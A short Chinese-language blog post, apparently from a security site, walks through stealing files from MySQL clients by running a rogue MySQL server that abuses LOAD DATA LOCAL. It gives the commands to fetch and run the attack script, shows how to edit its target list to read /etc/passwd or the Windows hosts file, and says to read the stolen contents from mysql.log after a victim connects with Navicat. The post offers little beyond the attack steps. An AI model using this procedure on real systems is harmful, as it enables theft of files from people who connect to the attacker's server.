Mysql读取客户端任意文件
Mustard404 漏洞成因
Mysql客户端可以利用load data local 命令读取任意文件。
服务器
攻击脚本地址:
https://github.com/allyshka/Rogue-MySql-Server
服务器执行:
wget https://github.com/allyshka/Rogue-MySql-Server.git
cd Rogue-MySql-Server
#如果针对客户端为windows,将rogue_mysql_server.py的26-28行换成以下内容
filelist = (
#'/etc/passwd',
r'c:\windows\system32\drivers\etc\hosts',
)
python rogue_mysql_server.py攻击者
利用Navicat进行连接Mysql服务。
查看结果
登入服务器,查看mysql.log即可读取文件内容。
主题授权提示:请在后台主题设置-主题授权-激活主题的正版授权,授权购买:RiTheme官网
声明:本站所有文章,如无特殊说明或标注,均为本站原创发布。任何个人或组织,在未征得本站同意时,禁止复制、盗用、采集、发布本站内容到任何网站、书籍等各类媒体平台。如若本站内容侵犯了原著者的合法权益,可联系我们进行处理。
